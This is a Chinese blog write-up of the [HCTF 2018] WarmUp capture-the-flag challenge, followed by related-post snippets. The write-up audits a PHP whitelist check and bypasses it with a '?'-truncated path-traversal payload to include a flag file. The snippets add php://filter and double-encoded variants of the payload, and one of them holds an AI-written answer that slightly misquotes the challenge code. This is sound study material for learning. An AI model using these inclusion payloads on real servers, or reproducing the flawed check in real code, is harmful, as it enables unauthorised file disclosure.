[HCTF 2018]WarmUp 1

最新推荐文章于 2025-06-02 11:32:48 发布
原创 最新推荐文章于 2025-06-02 11:32:48 发布 · 80 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android #网络安全

文章讲述了在PHP代码审计中,遇到一个带有白名单限制的文件访问逻辑,通过分析发现,要找到隐藏的文件需要理解URL编码和文件路径的处理方式。

题目一进来就是一张图片(本人是小白只是来做一下笔记的,还请大佬指点)
在这里插入图片描述
这道题是一个代码审计的题目,所以直接先看源码
在这里插入图片描述
可以看到源码非常的简短,可能有用的地方就只有绿色的source.php其他都是常规的HTML,尝试将其复制到url后进行打开
在这里插入图片描述
访问后果然得到了一段源码

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

可以看到白名单,whitelist里面只有source,和hint.php,于是再次尝试更改url访问
在这里插入图片描述
访问后得到了这个,他说flag不在这里,而在ffffllllaaaagggg这个东西中,我们这几次访问的都是/文件名.php所以猜测ffffllllaaaagggg是一个文件,通过目录层层查找将其找到。
现在的问题就是这个文件叫什么
再看代码解析(本人只是小白,还没学过php,凭着自己的理解和问chat gpt才写出来的解析,错了还请大佬指点)

<?php
    highlight_file(__FILE__);
    class emmm//先去看主函数,再来看类
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里定义了一个白名单,只能是source和hint才能访问
            if (! isset($page) || !is_string($page)) { //首先先检查传进来的参数page是否为字符串,否则返回flase
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {//再检查是否再白名单中,如果在就返回true
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')//是先将一个?添加到字符串的末尾,这样确保能够在这个字符串中找到?,然后再去查找第一次出现?的位置,将其截下来,重新赋值给page
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }//检查前面截断的page是否在白色名单中,这就要求了我们输入的文件名前要带上source.php?

            $_page = urldecode($page);//这里是进行url的编码
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')//还是提取?前的部分
            );
            if (in_array($_page, $whitelist)) {//检测是否在白名单中
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
//首先是一个主函数,对输入的文件名进行判断,如果符合了三个if的条件才会查找出那个文件
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])//这里的三个条件分别是输入的文件名不为空并且是字符串,并且还要满足checkFile这个类的这个函数判断所返回的结果,所以我们继续去看类里面
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  //否则就会弹出一开始的那个图片
?>

因此我们要在前面输入白名单.php?再去找文件的位置,一层层利用…/查找就可以找到最终的层数
http://601a3a11-94e9-4d20-892e-1714498a42dc.node4.buuoj.cn:81/?file=source.php?../…/…/…/…/ffffllllaaaagggg
最后获得flag

在这里插入图片描述

TID12
关注
[HCTF 2018]WarmUp
1ance's blog
11-17 2157
文章目录环境解题思路总结 环境 BUUCTF上web的第一题,启动靶机,访问链接。 ·http://f53eba82-0f2f-4f96-8120-1c4e8a4711c2.node4.buuoj.cn:81/ 解题思路 根据题目提示是代码审计。 查看源码,发现有提示source.php。 访问看看,果然发现php源码,接下来就是审计代码绕过了。 <?php highlight_file(__FILE__); class emmm { public sta
BUUCTF: [HCTF 2018]WarmUp 1
emdog的博客
10-21 2939
1、打开链接,只有这个笑脸,首先想到的肯定是查看源码 2、按下F12或者是Ct+U查看源码,如下显示,可以看到有source.php注释 3、通过在原URL后添加/source.php,可查看到如下内容,进行代码审计,分析源码。 <?php highlight_file(__FILE__); class emmm { //传入变量,也就是file,赋值给page public static function checkFile(&$page
【BUUCTF】[HCTF 2018]WarmUp 1
manerzi的博客
12-16 378
【BUUCTF】[HCTF 2018]WarmUp 1
[HCTF 2018]WarmUp 1--详细解析
m0_56019217的博客
11-03 2720
is_string()判断参数是否为字符串。现在我们所在的界面是source.php,所以我们令file=hint.php,返回值为true,就能包含hint.php,查看该文件的内容。mb_substr()会截取问号之前的数据,也就是截取了hint.php带入白名单查询,查询结果为true,返回值为true.mb_substr() 用于截取字符串,第一个参数为字符串,第二个和第三个参数分别为起始索引和终止索引。checkFile()结果为true时,返回值为true.在当前界面包含file指向的文件。
HCTF 2018]WarmUp 1
zip471642048的博客
04-16 265
HCTF 2018]WarmUp 1 创建环境访问进去发现一个滑稽的表情 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3C9iOhON-1618558954585)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20210416135508475.png)] 我们查看源码在注释部分发现source.php 接下来我们访问source.php,发现源代码 <?php
BUUCTF[HCTF 2018]WarmUp 1
10-21
1. **源代码查看与漏洞分析**: 在CTF(Capture The Flag)竞赛中,查看源代码是获取服务器端脚本逻辑的重要手段。通过观察源代码,可以理解程序的运行机制、判断逻辑和潜在漏洞。例如,在提供的代码中,通过...
[HCTF 2018]WarmUp1
whale_waves的博客
10-11 209
include函数有一个机制,如果你直接访问文件比如说index.php,他就会在当前目录下取寻找,添加../是返回上一级的意思,./的意思是就在这个路径寻找。所以最后的payload:/index.php?,最后触发include包含函数还需要url中有file。进行代码分析,每行代码都有代码分析方便记住,以及做笔记。查看源代码有提示,访问source.php。首先先访问hint.php。简单php代码审计题。
BUUCTF[HCTF 2018]WarmUp 1题解
最新发布
2301_79896143的博客
06-02 1145
BUUCTF[HCTF 2018]WarmUp题解:通过分析滑稽表情页面的PHP源码,发现文件包含漏洞。代码审计显示程序以白名单方式检查文件参数,但可通过构造payload绕过。利用hint.php提示的flag文件名,在参数后添加?/../../../../路径遍历访问根目录的ffffllllaaaagggg文件。最终通过多层../目录跳转获取flag{966bef86-ebda-43d8-8703-8e6a57b211de}。考察PHP代码审计和目录遍历漏洞利用能力。
HCTF 2018-warmup
m0_73303597的博客
12-07 524
自用
HCTF 2018 Warm up
qq_53689523的博客
02-06 301
所以,可以知道flag在ffffllllaaaagggg中,接下来,我们分析source.php文件,我们看到其设置了白名单(source.php和hint.php),如果不在白名单内,直接返回False,根本就不会执行文件查询语句,所以只有构造url,绕过source.php,才可以访问到ffffllllaaaagggg文件。看到源代码里提示一个source.php文件,所以我们猜测,要么是加载过来一个php文件(可是F12以后,没有发现),要么就是当前目录下有个source.php。
[HCTF 2018]WarmUp 1 【PHP 】【代码审计】
PromisingQ
07-26 6875
点击链接进入靶场环境 http://25b27cdf-be1c-4795-bc37-c610b063df64.node3.buuoj.cn/ 查看源码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> &l
BUU HCTF2018 WarmUP
yingyugo的博客
11-24 1485
开始BUUCTF受虐的第一天,好的,首先打开第一题,映入眼帘的就是这偌大的笑脸 然后ctrl+u出来源码看看 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-U
Buuctf web [HCTF 2018]WarmUp 1
weixin_47174945的博客
11-04 1530
1.首先打开是一个笑脸通过ctrl+u就会看到一个的注释 2.通过soure.php 观察源码发现hint.php,打开发现flag not here, and flag in ffffllllaaaagggg,观察到如果满足相应的条件,最后是include引入文件,所以这个信息很有用。我们只需使emmm::checkFile($_REQUEST[‘file’]返回值为true,利用…/跳转目录读取flag即可 观察checkFile函数,几个if语句并列,只要我们满足其中一个true,即有返回值,便不
三,[HCTF 2018]WarmUp1PHP 代码审计
2402_87039650的博客
11-26 1113
这段代码试图通过白名单机制来限制可以包含的文件,但存在潜在的漏洞,因为检查逻辑可能允许通过特定的 URL 编码和构造来绕过这些限制。为了增强安全性,应该简化检查逻辑,避免不必要的字符串操作,并确保只有完全匹配白名单中的文件名才被允许。检查 $_REQUEST['file'] 是否非空、是字符串类型,并且通过了 emmm::checkFile 方法的检查。定义了一个数组 $whitelist,包含两个键值对,键是字符串(在这个逻辑中未使用),值是允许包含的文件名。检查截取后的 $_page 是否在白名单中。
HCTF 2018WarmUp
Lixunzhe0112的博客
01-17 1808
原理如下:在我们将参数传给file时,服务器端会自动进行一次url解码,然后这里还有个urldecode再进行一次解码。_REQUEST[‘file’])&& emmm::checkFile($_REQUEST[‘file’]三个条件同时为真,才会包含我们传入的file。/flag.php’)和include(‘…所以:/var/www/flag.php 和…/var/www/flag.php是一个文件,上层没有了。说明flag.php在 /var/html类似目录中,只有两层,var为最上层了。
web-[HCTF 2018]WarmUp
wojiushilsy的博客
04-03 336
ad
第一题——[HCTF 2018]WarmUp
分享简单的安全技术
03-31 712
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,迎面而来的是一张滑稽图片,按f12查看,发现提示:source.php 第二步:在URL一栏输入访问提示给出的php页面 http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php 第三步:查看source.php页面给出的提示 <?php highlight_file(__FILE__); class emm
【BUUCTF】Web之[HCTF 2018]WarmUp 1
qq_45972928的博客
05-02 1500
1、首先打开题目链接 2、因为是php代码审计,所以我们尝试寻找代码。先查看网页源码 这里发现一个注释的php文件 3、尝试对source.php进行访问 4、出现了php代码,进行代码分析 ① 观察参数file,首先file不能为空,其次要满足是字符串类型 php if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFil.
buuctf[HCTF 2018]WarmUp 1
m0_73734159的博客
10-22 563
这里就是说一直返回上一级查找,直到查找到flag为止,最终返回到/root根目录,因为ffffllllaaaagggg原本是在hint.php文件里面嘛,所以说要一直往上一级目录找它的原始位置,4、“/”处于Linux文件系统树形结构的最顶端,我们称它为Linux文件系统的root,它是Linux文件系统的入口。/倒不是一定是6个,看你的flag具体在那个上一级目录了😉。”表示上一级目录,也可以用“…1、“.”表示当前目录,也可以用“./”表示。3、“~” 代表用户自己的宿主目录。
[HCTF 2018]WarmUp 1
04-01
<think>好的,我现在需要帮用户解决HCTF 2018 WarmUp题目的解题思路。首先,我应该先回忆一下这个题目的基本情况。根据用户提供的引用内容,这题可能涉及到Web安全方面的挑战,比如CTF题目常见的漏洞类型,比如文件包含、代码审计等。 用户提到参考站内引用中的第三部分是关于[HCTF 2018]WarmUp的解题思路,所以首先需要从这些信息中提取关键点。根据引用中的描述,解题思路可能涉及几个步骤:首先访问页面,查看源代码;然后发现提示,比如source.php;接着分析该文件的内容,寻找可能的漏洞点,比如文件包含或PHP伪协议利用。 接下来,我需要详细拆解每个可能的步骤。比如,第一步访问网站后,查看页面源代码,可能会发现注释中的提示,例如source.php文件。访问这个文件后,可能会得到PHP代码,这时候需要进行代码审计。代码中可能存在文件包含漏洞,比如使用include或require函数,并且参数未经过滤或过滤不严。 在代码审计过程中,需要关注如何绕过安全措施。例如,代码中可能检查参数是否在白名单中,或者是否以特定字符串开头。这时候可能要用到目录穿越,比如使用../../../../etc/passwd这样的路径,或者利用PHP伪协议如php://filter来读取源代码。 另外,可能还需要考虑服务器的文件结构,比如flag文件的位置,常见的如/flag,/var/www/html/flag.txt等。通过构造合适的payload,利用文件包含漏洞来读取这些文件。 还需要注意题目是否有其他陷阱,比如需要绕过strpos检查,或者利用二次编码来绕过过滤。例如,如果代码检查参数是否以某个字符串开头,可以通过编码绕过,比如使用%2566来代表f,因为服务器可能进行两次URL解码。 然后,总结解题步骤:查看源代码找到提示文件,审计代码找漏洞点,构造payload绕过过滤,读取flag文件。同时,要确保每一步都符合题目的具体设置,可能不同的题目会有不同的过滤方式,需要根据实际情况调整payload。 最后,生成相关问题,覆盖文件包含漏洞、PHP伪协议、代码审计等方面,帮助用户深入理解相关知识点。</think>### [HCTF 2018]WarmUp 解题思路 #### 1. 初始页面与源代码分析 - 访问题目地址后,页面显示一个卡通笑脸表情。 - **关键操作**:查看页面源代码,发现注释中提示 `source.php`,访问该路径获取服务器端PHP代码[^1]。 #### 2. 代码审计关键点 ```php <?php class emmm { public static function checkFile(&$page) { $whitelist = ["source" => "source.php", "hint" => "hint.php"]; if (!isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr($page, 0, mb_strpos($page . '?', '?')); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?')); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (empty($_REQUEST['file'])) { include 'hint.php'; } else { $file = $_REQUEST['file']; if (emmm::checkFile($file)) { include $file; } else { echo "you can't see it"; } } ``` - **漏洞点**:`include $file` 存在文件包含漏洞,但需通过 `checkFile()` 校验。 - **绕过逻辑**: 1. `$whitelist` 白名单仅允许 `source.php` 和 `hint.php`。 2. 利用 `mb_substr` 截取 `?` 前的路径,结合多次URL解码绕过检查。 #### 3. 构造Payload读取flag - **hint.php提示**:`flag not here, and flag in ffffllllaaaagggg`(暗示flag文件路径)。 - **Payload构造**: ```url file=source.php?/../../../../../ffffllllaaaagggg ``` - 原理:利用 `?` 截断路径检查,通过目录穿越访问根目录下的目标文件。 #### 4. 其他绕过方式 - **PHP伪协议**(若服务器允许): ```url file=php://filter/read=convert.base64-encode/resource=ffffllllaaaagggg ``` - **二次URL编码**(应对严格过滤): ```url file=source.php%253F/..%252F..%252F..%252F..%252F..%252Fffffllllaaaagggg ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值